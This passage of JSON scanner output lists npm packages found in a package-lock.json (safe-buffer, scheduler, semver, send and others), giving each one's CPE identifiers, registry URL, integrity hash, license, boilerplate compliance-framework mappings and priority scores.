"cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/run-parallel@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", "dependencies": { "queue-microtask": "^1.2.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0d59c1e836c63d4a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: safe-buffer 5.1.2", "title": "safe-buffer 5.1.2", "description": "Package discovered: safe-buffer 5.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "36d9a8484ed180a6", "name": "safe-buffer", "version": "5.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/safe-buffer@5.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "982541a2a19fdc52", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: safe-buffer 5.2.1", "title": "safe-buffer 5.2.1", "description": "Package discovered: safe-buffer 5.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "28135efb01cb74b9", "name": "safe-buffer", "version": "5.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/safe-buffer@5.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "186ed2340219a99c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: safer-buffer 2.1.2", "title": "safer-buffer 2.1.2", "description": "Package discovered: safer-buffer 2.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bc8acb243e9d9464", "name": "safer-buffer", "version": "2.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/safer-buffer@2.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2ab87631c01bfc3f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: scheduler 0.17.0", "title": "scheduler 0.17.0", "description": "Package discovered: scheduler 0.17.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e689757d7bf8470d", "name": "scheduler", "version": "0.17.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/scheduler@0.17.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz", "integrity": "sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA==", "dependencies": { "loose-envify": "^1.1.0", "object-assign": "^4.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bbbd7dd6a8a5a506", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: scheduler 0.23.2", "title": "scheduler 0.23.2", "description": "Package discovered: scheduler 0.23.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d0ebbd8a4bc7ada1", "name": "scheduler", "version": "0.23.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/scheduler@0.23.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz", "integrity": "sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==", "dependencies": { "loose-envify": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "613adae5df8a79db", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: scmp 2.1.0", "title": "scmp 2.1.0", "description": "Package discovered: scmp 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "607830ce210254e3", "name": "scmp", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/scmp@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz", "integrity": "sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "186e8c930a60e0f6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: selderee 0.11.0", "title": "selderee 0.11.0", "description": "Package discovered: selderee 0.11.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a6fb1c756dcd04fc", "name": "selderee", "version": "0.11.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/selderee@0.11.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz", "integrity": "sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA==", "dependencies": { "parseley": "^0.12.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "809205930987a974", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: semver 7.7.4", "title": "semver 7.7.4", "description": "Package discovered: semver 7.7.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dc47801cc9b2ec78", "name": "semver", "version": "7.7.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/semver@7.7.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.4.tgz", "integrity": "sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "67469cce48d87167", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: send 0.19.2", "title": "send 0.19.2", "description": "Package discovered: send 0.19.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1d81dd407a94f88a", "name": "send", "version": "0.19.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/send@0.19.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/send/-/send-0.19.2.tgz", "integrity": "sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg==", "dependencies": { "debug": "2.6.9", "depd": "2.0.0", "destroy": "1.2.0", "encodeurl": "~2.0.0", "escape-html": "~1.0.3", "etag": "~1.8.1", "fresh": "~0.5.2", "http-errors": "~2.0.1", "mime": "1.6.0", "ms": "2.1.3", "on-finished": "~2.4.1", "range-parser": "~1.2.1", "statuses": "~2.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3a3b9a5d9af10f0c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: serve-static 1.16.3", "title": 